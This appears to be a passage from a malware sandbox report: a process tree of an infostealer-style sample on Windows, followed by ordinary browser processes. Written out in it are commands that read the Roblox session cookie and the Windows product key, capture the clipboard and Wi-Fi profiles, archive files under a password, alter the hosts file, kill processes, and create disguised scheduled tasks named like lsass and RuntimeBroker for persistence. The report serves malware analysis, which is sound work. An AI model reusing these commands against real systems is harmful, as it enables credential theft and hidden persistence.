Command line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
- Suspicious use of AdjustPrivilegeToken
PID: 6640

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
- Clipboard Data
PID: 4396

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell Get-Clipboard
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID: 6668

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
PID: 5588

[depth 7] C:\Windows\system32\tasklist.exe
Command line: tasklist /FO LIST
- Enumerates processes with tasklist
PID: 6676

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
PID: 5648

[depth 7] C:\Windows\system32\tree.com
Command line: tree /A /F
PID: 6864

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
- System Network Configuration Discovery: Wi-Fi Discovery
PID: 4612

[depth 7] C:\Windows\system32\netsh.exe
Command line: netsh wlan show profile
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID: 6904

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "systeminfo"
PID: 5168

[depth 7] C:\Windows\system32\systeminfo.exe
Command line: systeminfo
- Gathers system information
PID: 6996

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
PID: 6096

[depth 7] C:\Windows\system32\reg.exe
Command line: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
PID: 6840

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
PID: 5984

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
- Suspicious behavior: EnumeratesProcesses
PID: 6892
[depth 8] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hr1u5m45\hr1u5m45.cmdline"
PID: 736

[depth 9] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5407.tmp" "c:\Users\Admin\AppData\Local\Temp\hr1u5m45\CSCFCAF61994D744DF592AB73FA113EA9A7.TMP"
PID: 6832

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
PID: 7164

[depth 7] C:\Windows\system32\tree.com
Command line: tree /A /F
PID: 6288

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
PID: 6168

[depth 7] C:\Windows\system32\attrib.exe
Command line: attrib -r C:\Windows\System32\drivers\etc\hosts
- Drops file in Drivers directory
- Views/modifies file attributes
PID: 6692

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
PID: 6428

[depth 7] C:\Windows\system32\tree.com
Command line: tree /A /F
PID: 6720

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
PID: 6728

[depth 7] C:\Windows\system32\tree.com
Command line: tree /A /F
PID: 1844

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
PID: 6936

[depth 7] C:\Windows\system32\attrib.exe
Command line: attrib +r C:\Windows\System32\drivers\etc\hosts
- Drops file in Drivers directory
- Views/modifies file attributes
PID: 6600

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
PID: 1712

[depth 7] C:\Windows\system32\tree.com
Command line: tree /A /F
PID: 5516

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
PID: 5880

[depth 7] C:\Windows\system32\tasklist.exe
Command line: tasklist /FO LIST
- Enumerates processes with tasklist
PID: 6412

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
PID: 620

[depth 7] C:\Windows\system32\tree.com
Command line: tree /A /F
PID: 6164

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5112"
PID: 6108

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 5112
- Kills process with taskkill
PID: 1712

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2784"
PID: 5292

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 2784
- Kills process with taskkill
PID: 6904

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5112"
PID: 5164

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 5112
- Kills process with taskkill
PID: 5140

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2164"
PID: 6736

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 2164
- Kills process with taskkill
PID: 3412

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2784"
PID: 5736

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 2784
- Kills process with taskkill
PID: 5912

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1848"
PID: 5888

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 1848
- Kills process with taskkill
PID: 6012

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2164"
PID: 7108

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 2164
- Kills process with taskkill
PID: 6956

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2692"
PID: 5280

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 2692
- Kills process with taskkill
PID: 5988

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1848"
PID: 5396

[depth 7] C:\Windows\system32\taskkill.exe
Command line: taskkill /F /PID 1848
- Kills process with taskkill
PID: 6832

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4032"
PID: 6980
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40327⤵
- Kills process with taskkill
PID:2224 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2692"6⤵PID:1136
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 26927⤵
- Kills process with taskkill
PID:400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5072"6⤵PID:6504
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 50727⤵
- Kills process with taskkill
PID:6264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4032"6⤵PID:5492
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6640
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40327⤵
- Kills process with taskkill
PID:7120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"6⤵PID:6304
-
C:\Windows\system32\getmac.exegetmac7⤵PID:5564
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 232"6⤵PID:4428
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 2327⤵
- Kills process with taskkill
PID:6492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5072"6⤵PID:5356
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 50727⤵
- Kills process with taskkill
PID:6748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 116"6⤵PID:6676
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 1167⤵
- Kills process with taskkill
PID:6412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 232"6⤵PID:5604
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 2327⤵
- Kills process with taskkill
PID:4964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 116"6⤵PID:5752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1020
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 1167⤵
- Kills process with taskkill
PID:5420 -
C:\Windows\system32\cmd.exe (depth 6, PID 5932)
  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 7, PID 2544)
  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  - Command and Scripting Interpreter: PowerShell

C:\Windows\system32\cmd.exe (depth 6, PID 6760)
  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 7, PID 7012)
  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe (depth 6, PID 6868)
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exe a -r -hp"h3x" "C:\Users\Admin\AppData\Local\Temp\zXZ4E.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exe (depth 7, PID 4192)
  C:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exe a -r -hp"h3x" "C:\Users\Admin\AppData\Local\Temp\zXZ4E.zip" *
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.exe (depth 6, PID 4848)
  C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe (depth 7, PID 1600)
  wmic os get Caption

C:\Windows\system32\cmd.exe (depth 6, PID 6420)
  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe (depth 7, PID 1672)
  wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe (depth 6, PID 6704)
  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Conhost.exe (depth 7, PID 5988)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe (depth 7, PID 5396)
  wmic csproduct get uuid

C:\Windows\system32\cmd.exe (depth 6, PID 6168)
  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 7, PID 6444)
  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  - Command and Scripting Interpreter: PowerShell

C:\Windows\system32\cmd.exe (depth 6, PID 3344)
  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe (depth 7, PID 2208)
  wmic path win32_VideoController get name
  - Detects videocard installed

C:\Windows\system32\cmd.exe (depth 6, PID 1724)
  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 7, PID 6500)
  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe (depth 6, PID 6064)
  C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe""
  - System Network Configuration Discovery: Internet Connection Discovery

C:\Windows\system32\PING.EXE (depth 7, PID 2260)
  ping localhost -n 3
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe

C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe (depth 4, PID 5312)
  "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\SysWOW64\WScript.exe (depth 5, PID 5568)
  "C:\Windows\System32\WScript.exe" "C:\agentComponentFontNet\bxoJGLIQD6QziGsZBKG.vbe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\cmd.exe (depth 6, PID 6404)
  C:\Windows\system32\cmd.exe /c ""C:\agentComponentFontNet\ijkdLO.bat" "
  - System Location Discovery: System Language Discovery

C:\agentComponentFontNet\MsHyperPort.exe (depth 7, PID 6508)
  "C:\agentComponentFontNet\MsHyperPort.exe"
  - Executes dropped EXE

C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe (depth 4, PID 5912)
  "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\SysWOW64\WScript.exe (depth 5, PID 5680)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\chainReviewdhcp\zwrFyO.vbe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\cmd.exe (depth 6, PID 5524)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\chainReviewdhcp\FBfKzmFJ0gnf1.bat" "
  - System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe (depth 7, PID 6884)
  "C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
  - Executes dropped EXE

C:\Windows\SYSTEM32\cmd.exe (depth 3, PID 6076)
  cmd.exe /c attrib "+h " "+s " C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform

C:\Windows\system32\attrib.exe (depth 4, PID 5648)
  attrib "+h " "+s " C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform
  - Sets file to hidden
  - Views/modifies file attributes
C:\Windows\system32\schtasks.exe (depth 1, PID 6740)
  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 400)
  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 6696)
  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1844)
  schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\agentComponentFontNet\System.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2244)
  schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\agentComponentFontNet\System.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 7088)
  schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\agentComponentFontNet\System.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4428)
  schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 6832)
  schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1664)
  schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 6776)
  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 7044)
  schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 7032)
  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 6540)
  schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 9 /tr "'C:\agentComponentFontNet\TrustedInstaller.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 6348)
  schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\agentComponentFontNet\TrustedInstaller.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 6352)
  schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 13 /tr "'C:\agentComponentFontNet\TrustedInstaller.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1712)
  schtasks.exe /create /tn "RunShellR" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 5680)
  schtasks.exe /create /tn "RunShell" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 6972)
  schtasks.exe /create /tn "RunShellR" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
C:\Program Files\Mozilla Firefox\firefox.exe (depth 1, PID 3140)
  "C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe (depth 2, PID 6392)
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 6696)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca866518-cd46-4b71-9d13-4654c595eef9} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" gpu

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 968)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a580688c-21eb-4a42-acf9-76b04f0d44e1} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" socket
  - Checks processor information in registry

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 1712)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3280 -childID 1 -isForBrowser -prefsHandle 3272 -prefMapHandle 3268 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {227b3b5a-9769-42d2-82c6-aaf1c93b82a4} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 5728)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3700 -childID 2 -isForBrowser -prefsHandle 3692 -prefMapHandle 3688 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64a83b9e-50d3-4e4e-a211-0eb3b8ad5577} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 4640)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4324 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4380 -prefMapHandle 4336 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00dd2c91-0b11-4dd0-a7fb-153fdfb0eaf1} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" utility
  - Checks processor information in registry

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 3616)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5300 -childID 3 -isForBrowser -prefsHandle 5292 -prefMapHandle 5288 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1add7f17-a727-49d2-a273-ddf5a1b1f578} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 2692)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 4 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb1f84f5-dcf4-49e2-b08b-e7868880c1df} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 3344)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5652 -childID 5 -isForBrowser -prefsHandle 5660 -prefMapHandle 5664 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2024e70-4a61-4d4d-a65c-e50d19b60da7} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab

C:\Program Files\Mozilla Firefox\firefox.exe (depth 3, PID 6368)
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6184 -childID 6 -isForBrowser -prefsHandle 6172 -prefMapHandle 6168 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b28b32d-db7b-4ede-b8da-bac60c3f1cad} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab
C:\Program Files\Google\Chrome\Application\chrome.exe (depth 1, PID 7032)
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6540)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd3833cc40,0x7ffd3833cc4c,0x7ffd3833cc58

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6800)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5156)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6488)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5696)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5772)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3368,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 1728)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3660 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 888)
